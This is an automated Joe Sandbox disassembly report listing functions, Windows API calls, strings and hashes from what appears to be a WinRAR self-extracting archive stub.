String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-3743209390
Opcode ID: f155a52fdd05bde8f568d6676ac87085970f69f3fb1a9dce0bc39e20dba7815c
Instruction ID: b7a86d8f4647f7bd99585f7fea925e5c48d77fc0d36b2e5874c9681a13e05bb1
Opcode Fuzzy Hash: f155a52fdd05bde8f568d6676ac87085970f69f3fb1a9dce0bc39e20dba7815c
Instruction Fuzzy Hash: DF61A071901391EFD370ABA6EC4AA6A3BACFF48740F004429F545D22A1DFBC9D44CB66

Function 007E9E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(007EAE4D,PNG,?,?,?,007EAE4D,00000066), ref: 007E9E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,007EAE4D,00000066), ref: 007E9E46
LoadResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E59
LockResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007EAE4D,00000066), ref: 007E9E82
GlobalLock.KERNEL32(00000000), ref: 007E9E93
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 007E9EB7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007E9EFC
GlobalUnlock.KERNEL32(00000000), ref: 007E9F1B
GlobalFree.KERNEL32(00000000), ref: 007E9F22

Strings

PNG, xrefs: 007E9E1F

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 95174eb4e536c6a90e730211c88f034fc68c2657161c3cb85985a62c8b8366c4
Instruction ID: 0e70d99596062a49609ac3f09731c52490d254e43a41fbe403705331c1d5b968
Opcode Fuzzy Hash: 95174eb4e536c6a90e730211c88f034fc68c2657161c3cb85985a62c8b8366c4
Instruction Fuzzy Hash: 2C31A272205746AFC7119F62DC4896BBFADFF8D751B044518FA02D2260EB75DC00CBA0

Function 007DA5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA692
GetLastError.KERNEL32(?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA69E

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 973e3793189f193660fea2e834e077707a1731b878f8ec53e9c2a506bc789a11
Instruction ID: 89efc1d0625645b9aa92bda550c31085dd11d5e7859f7ed111b3f580e52eca00
Opcode Fuzzy Hash: 973e3793189f193660fea2e834e077707a1731b878f8ec53e9c2a506bc789a11
Instruction Fuzzy Hash: D9416072505681EFC324EF78C884ADAF7F8BF48350F040A2AF599D3250D778A9548B92

Function 007F753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002,00000000), ref: 007F755E
TerminateProcess.KERNEL32(00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002,00000000), ref: 007F7565
ExitProcess.KERNEL32 ref: 007F7577

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e04f8a80133179e156dbe446f858ebcbd3ba08af8c44c95328a43878392bb289
Instruction ID: 84f2e77e220a922572997347595ad2b4862c0bfc403496928858da07fa7c03b9
Opcode Fuzzy Hash: e04f8a80133179e156dbe446f858ebcbd3ba08af8c44c95328a43878392bb289
Instruction Fuzzy Hash: C1E0B631005A48EBDF55AF64DD0DA693B69FB44781F108414FA098B322CB39DE52DA90

Function 007D857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D8580
_memcmp.LIBVCRUNTIME ref: 007D8A08

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 9685d0d4b49be97029a6dca2193695e303b541dd1af6521b181bdeb96c6d9e0a
Instruction ID: 56a09f1de806cf078499e5abe4862ca51860e48d0c4a824d9327b8985bb84881
Opcode Fuzzy Hash: 9685d0d4b49be97029a6dca2193695e303b541dd1af6521b181bdeb96c6d9e0a
Instruction Fuzzy Hash: BB821A70904245EEDF65DB64C885BFABBB9BF05300F0841BBE9499B342DB395A48CB61

Function 007EAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007EAEE5

Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365

Strings

"%s"%s, xrefs: 007EB423
__tmp_rar_sfx_access_check_%u, xrefs: 007EB1CB
winrarsfxmappingfile.tmp, xrefs: 007EB2BC
@, xrefs: 007EB2A7
-el -s2 "-d%s" "-sp%s", xrefs: 007EB281
C:\Users\user\Desktop, xrefs: 007EB2DF
<, xrefs: 007EB29A
LICENSEDLG, xrefs: 007EB771
STARTDLG, xrefs: 007EAF04

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-8108337
Opcode ID: 3506f9dbf26ce25577c283ff0cbdc102267382b782f430278f29c6beed1c7172
Instruction ID: 31025ff05378c3e9d74a018decc6327bc99bf36a083cd5b9b496f457e7d3de33
Opcode Fuzzy Hash: 3506f9dbf26ce25577c283ff0cbdc102267382b782f430278f29c6beed1c7172
Instruction Fuzzy Hash: 1542CEB0946294FEEB21ABA19C8AFEF3B7CFB09700F004455F645A62D1CB7C5944CB66

Function 007E00CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 007E00E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007E00F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007E0127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007E03D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E03F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007E0402
ReadFile.KERNEL32(00000000,?,00007FFE,00803BA4,00000000), ref: 007E0421
CloseHandle.KERNEL32(00000000), ref: 007E0479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007E048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 007E04E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 007E0510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 007E054A

Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2

_swprintf.LIBCMT ref: 007E05BE
_swprintf.LIBCMT ref: 007E060A

Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D

AllocConsole.KERNEL32 ref: 007E0612
GetCurrentProcessId.KERNEL32 ref: 007E061C
AttachConsole.KERNEL32(00000000), ref: 007E0623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 007E0649
WriteConsoleW.KERNEL32(00000000), ref: 007E0650
Sleep.KERNEL32(00002710), ref: 007E065B
FreeConsole.KERNEL32 ref: 007E0661
ExitProcess.KERNEL32 ref: 007E0669

Strings

Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 007E05F8
kernel32, xrefs: 007E00DD
uxtheme.dll, xrefs: 007E058B
dwmapi.dll, xrefs: 007E0194, 007E0581
SetDllDirectoryW, xrefs: 007E00F0
SetDefaultDllDirectories, xrefs: 007E0121
DXGIDebug.dll, xrefs: 007E0169, 007E04D3

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 672569b21f4462029c3f16eb68e86c3e8c54eda0bec0a46c137dfec849c9d237
Instruction ID: 5f86806a2426aea97e23a5d85224d67f789526708918ca85cba238913be5f531
Opcode Fuzzy Hash: 672569b21f4462029c3f16eb68e86c3e8c54eda0bec0a46c137dfec849c9d237
Instruction Fuzzy Hash: FDD161B1149784ABD3A09F91DC49B9FBAECFB85704F00491DF789D6290DBB4864C8B62

Function 007EBDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 007EBDFA

Part of subcall function 007EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007EAAFE

SetWindowTextW.USER32(?,?), ref: 007EC127
_wcsrchr.LIBVCRUNTIME ref: 007EC2B1
GetDlgItem.USER32(?,00000066), ref: 007EC2EC
SetWindowTextW.USER32(00000000,?), ref: 007EC2FC
SendMessageW.USER32(00000000,00000143,00000000,0081A472), ref: 007EC30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007EC335

Strings

ProgramFilesDir, xrefs: 007EC1FB
%s.%d.tmp, xrefs: 007EBFF6
<br>, xrefs: 007EC08A
Software\Microsoft\Windows\CurrentVersion, xrefs: 007EC1D0

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: a10e25585427896f0f0ada2bb21935fe283f656f348d83d492738669c6f240c5
Instruction ID: 6aac3d8b9252ea112e70e6282f888189a33efc1b2cea1137a3e674c2a09bd7a6
Opcode Fuzzy Hash: a10e25585427896f0f0ada2bb21935fe283f656f348d83d492738669c6f240c5
Instruction Fuzzy Hash: AEE19176D01258EADB26DBA5DC49DEF777CBF08310F0040A6F609E3191EB789A85CB60

Function 007DD341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 007DD346
_wcschr.LIBVCRUNTIME ref: 007DD367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,007DD328,?), ref: 007DD382
__fprintf_l.LIBCMT ref: 007DD873

Part of subcall function 007E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007DB652,00000000,?,?,?,00070332), ref: 007E1396

Strings

R, xrefs: 007DD4E5
$%s:, xrefs: 007DD856
a, xrefs: 007DD4EF
@%s:, xrefs: 007DD85D, 007DD869
, xrefs: 007DD67A
RTL, xrefs: 007DD838
*messages***, xrefs: 007DD49A
*messages***, xrefs: 007DD4D3
,, xrefs: 007DD8AE

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: 6846c4ec9c3ef5d2bfa47197903d199ce6ee48304dbbac20910799ddfdfff58b
Instruction ID: 1925ce5728921edcc97bc0ea29bd7d70955d3f49662165c6bfe71f4fa674649d
Opcode Fuzzy Hash: 6846c4ec9c3ef5d2bfa47197903d199ce6ee48304dbbac20910799ddfdfff58b
Instruction Fuzzy Hash: 3E12B1B1900219DACF34DFA4DC95AEEB7B5FF44310F10456AE606A7381EB79AE44CB60

Function 007ECB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
Part of subcall function 007EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
Part of subcall function 007EAC74: IsDialogMessageW.USER32(00070332,?), ref: 007EACAA
Part of subcall function 007EAC74: TranslateMessage.USER32(?), ref: 007EACB8
Part of subcall function 007EAC74: DispatchMessageW.USER32(?), ref: 007EACC2

GetDlgItem.USER32(00000068,0082ECB0), ref: 007ECB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,007EA632,00000001,?,?,007EAECB,00804F88,0082ECB0), ref: 007ECB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007ECBA1
SendMessageW.USER32(00000000,000000C2,00000000,008035B4), ref: 007ECBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007ECBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007ECBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007ECC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007ECC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007ECC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007ECC67
SendMessageW.USER32(00000000,000000C2,00000000,0080431C), ref: 007ECC76

Strings

\, xrefs: 007ECBCF

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: e429890a9a34df0902bcfb39bef8a6a38b5db1867a2787f41791d672f71c3360
Instruction ID: c64c597aa42ba95aea1fcaab22b3a2bedefd1fb43b21435295c997cb21e34d5d
Opcode Fuzzy Hash: e429890a9a34df0902bcfb39bef8a6a38b5db1867a2787f41791d672f71c3360
Instruction Fuzzy Hash: 1631CF71185B51BFE301DF20AC5AFAB7FACFB86704F000918F651962A1DB685908C7BA

Function 007ECE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 007ECF54
ShowWindow.USER32(?,00000000), ref: 007ECF93
GetExitCodeProcess.KERNEL32(?,?), ref: 007ECFCF
CloseHandle.KERNEL32(?), ref: 007ECFF5
ShowWindow.USER32(?,00000001), ref: 007ED084

Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2

Strings

, xrefs: 007ECEA2
.exe, xrefs: 007ECFFF
.inf, xrefs: 007ECF10

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 6720969aa5c63271a31f17626ad64a83842f5b0cf029c05ff9a59dabd1eaef99
Instruction ID: 6849759ff1899d5a2e0c6c78b16893516f5e1225bcf5f137ad566bdc54809264
Opcode Fuzzy Hash: 6720969aa5c63271a31f17626ad64a83842f5b0cf029c05ff9a59dabd1eaef99
Instruction Fuzzy Hash: 0161F3754063C0DAD7329F66D8146ABBBE9FF89300F088819F5C097250D7B98D8ACB52

Function 007FA058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F4E35,007F4E35,?,?,?,007FA2A9,00000001,00000001,3FE85006), ref: 007FA0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 007FA138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007FA232
__freea.LIBCMT ref: 007FA23F

Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A

__freea.LIBCMT ref: 007FA248
__freea.LIBCMT ref: 007FA26D

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e9062ccab8d391b5810199b49617542d7f51d51f2b7d34cb19a13124aa6947f7
Instruction ID: 185b491158e7cde798edfb3cfe4487b2a589ed118eaa2d6fee0683578bb153f6
Opcode Fuzzy Hash: e9062ccab8d391b5810199b49617542d7f51d51f2b7d34cb19a13124aa6947f7
Instruction Fuzzy Hash: D251B3B271021EBFDB259F64CC45EBB77A9FB84760F154628FE08D6241DB39DC408662

Function 007EA335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2

OleInitialize.OLE32(00000000), ref: 007EA34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007EA385
SHGetMalloc.SHELL32(00818430), ref: 007EA38F

Strings

riched20.dll, xrefs: 007EA33D
3Ro, xrefs: 007EA366

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 50514a541aa4087b7c6a6c6d9cced41be74f07c959f7124ec129399d8b5c67af
Instruction ID: 7acad33624b285af761e64f4aecf488f9c0709401e5ddc76b635572a5918c19d
Opcode Fuzzy Hash: 50514a541aa4087b7c6a6c6d9cced41be74f07c959f7124ec129399d8b5c67af
Instruction Fuzzy Hash: 36F04FB1C00209ABCB10AF9AD8499EFFBFCFF94301F00455AE914E2200DBB856458BA1

Function 007D99B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,007D78AD,?,00000005,?,00000011), ref: 007D9A4C
GetLastError.KERNEL32(?,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,007D78AD,?,00000005,?), ref: 007D9A8E
